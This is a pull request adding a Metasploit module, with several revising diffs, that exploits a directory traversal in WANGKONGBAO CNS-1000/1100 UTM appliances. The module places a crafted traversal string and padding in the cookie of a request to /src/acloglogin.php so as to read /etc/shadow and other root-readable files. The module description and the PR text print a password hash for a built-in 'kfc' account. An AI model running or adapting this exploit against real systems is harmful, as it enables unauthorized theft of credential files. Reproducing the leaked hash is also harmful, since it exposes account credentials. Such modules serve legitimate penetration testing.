### PR TITLE
Add Dillion's module for Wangkongbao

### DIFF
--- a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb
+++ b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb
@@ -52,10 +52,9 @@ class Metasploit3 < Msf::Auxiliary
 		travs = "../" * datastore['DEPTH']
 
 		# Create request
-		path = "/src/acloglogin.php"
 		res = send_request_raw({
 			'method' => 'GET',
-			'uri'    => "path",
+			'uri'    => "/src/acloglogin.php",
 			'headers' =>
 				{
 					'Connection' => "keep-alive",

--- a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb
+++ b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
 		register_options(
 			[
 				Opt::RPORT(85),
-				OptString.new('FILEPATH', [false, 'The name of the file to download', 'etc/shadow']),
+				OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/shadow']),
 				OptInt.new('DEPTH', [true, 'Traversal depth', 10])
 			], self.class)
 	end
@@ -50,6 +50,7 @@ class Metasploit3 < Msf::Auxiliary
 		end
 
 		travs = "../" * datastore['DEPTH']
+		travs = travs[0,travs.rindex('/')]
 
 		# Create request
 		res = send_request_raw({

--- a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb
+++ b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
 		register_options(
 			[
 				Opt::RPORT(85),
-				OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/shadow']),
+				OptString.new('FILEPATH', [false, 'The name of the file to download', 'etc/shadow']),
 				OptInt.new('DEPTH', [true, 'Traversal depth', 10])
 			], self.class)
 	end

--- a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb
+++ b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb
@@ -1,0 +1,84 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => 'WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal',
+			'Description'    => %q{
+					This module exploits the WANGKONGBAO CNS-1000 and 1100 UTM appliances aka
+				Network Security Platform. This directory traversal vulnerability is interesting
+				because the apache server is running as root, this means we can grab anything we
+				want! For instance, the /etc/shadow and /etc/passwd files for the special 
+				kfc:$1$SlSyHd1a$PFZomnVnzaaj3Ei2v1ByC0:15488:0:99999:7::: user
+			},
+			'References'     =>
+				[
+					['EDB', '19526']
+				],
+			'Author'         =>
+				[
+					'Dillon Beresford'
+				],
+			'License'        =>  MSF_LICENSE
+		))
+
+		register_options(
+			[
+				Opt::RPORT(85),
+				OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/shadow']),
+				OptString.new('DIRTRAVS', [true, 'Traversal depth', '../../../../../../../../../..'])
+			], self.class)
+	end
+
+	def run_host(ip)
+		# No point to continue if no filename is specified
+		if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
+			print_error("Please supply the name of the file you want to download")
+			return
+		end
+
+		# Create request
+		path = "/src/acloglogin.php"
+		res = send_request_raw({
+			'method' => 'GET',
+			'uri'    => "path",
+			'headers' =>
+				{
+					'Connection' => "keep-alive",
+					'Accept-Encoding' => "zip,deflate",
+					'Cookie' => "PHPSESSID=af0402062689e5218a8bdad17d03f559; lang=owned" + datastore['DIRTRAVS'] + datastore['FILEPATH'] + "/."*4043
+				},
+		}, 25)
+
+		print_status "File retreived successfully!"
+
+		# Show data if needed
+		if res and res.code == 200
+			vprint_line(res.to_s)
+			fname = File.basename(datastore['FILEPATH'])
+
+			path = store_loot(
+				'cns1000utm.http',
+				'application/octet-stream',
+				ip,
+				res.body,
+				fname
+			)
+			print_status("File saved in: #{path}")
+		else
+			print_error("Nothing was downloaded")
+		end
+	end
+end

--- a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb
+++ b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
 					This module exploits the WANGKONGBAO CNS-1000 and 1100 UTM appliances aka
 				Network Security Platform. This directory traversal vulnerability is interesting
 				because the apache server is running as root, this means we can grab anything we
-				want! For instance, the /etc/shadow and /etc/passwd files for the special 
+				want! For instance, the /etc/shadow and /etc/passwd files for the special
 				kfc:$1$SlSyHd1a$PFZomnVnzaaj3Ei2v1ByC0:15488:0:99999:7::: user
 			},
 			'References'     =>
@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
 			[
 				Opt::RPORT(85),
 				OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/shadow']),
-				OptString.new('DIRTRAVS', [true, 'Traversal depth', '../../../../../../../../../..'])
+				OptInt.new('DEPTH', [true, 'Traversal depth', 10])
 			], self.class)
 	end
 
@@ -49,6 +49,8 @@ class Metasploit3 < Msf::Auxiliary
 			return
 		end
 
+		travs = "../" * datastore['DEPTH']
+
 		# Create request
 		path = "/src/acloglogin.php"
 		res = send_request_raw({
@@ -58,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
 				{
 					'Connection' => "keep-alive",
 					'Accept-Encoding' => "zip,deflate",
-					'Cookie' => "PHPSESSID=af0402062689e5218a8bdad17d03f559; lang=owned" + datastore['DIRTRAVS'] + datastore['FILEPATH'] + "/."*4043
+					'Cookie' => "PHPSESSID=af0402062689e5218a8bdad17d03f559; lang=owned" + travs + datastore['FILEPATH'] + "/."*4043
 				},
 		}, 25)
 


### PR DESCRIPTION
From Dillion's description: 

This module exploits the WANGKONGBAO CNS-1000 and 1100 UTM appliances aka Network Security Platform. This directory traversal vulnerability is interesting because the apache server is running as root, this means we can grab anything we want! For instance, the /etc/shadow and /etc/passwd files for the special kfc:$1$SlSyHd1a$PFZomnVnzaaj3Ei2v1ByC0:15488:0:99999:7::: user
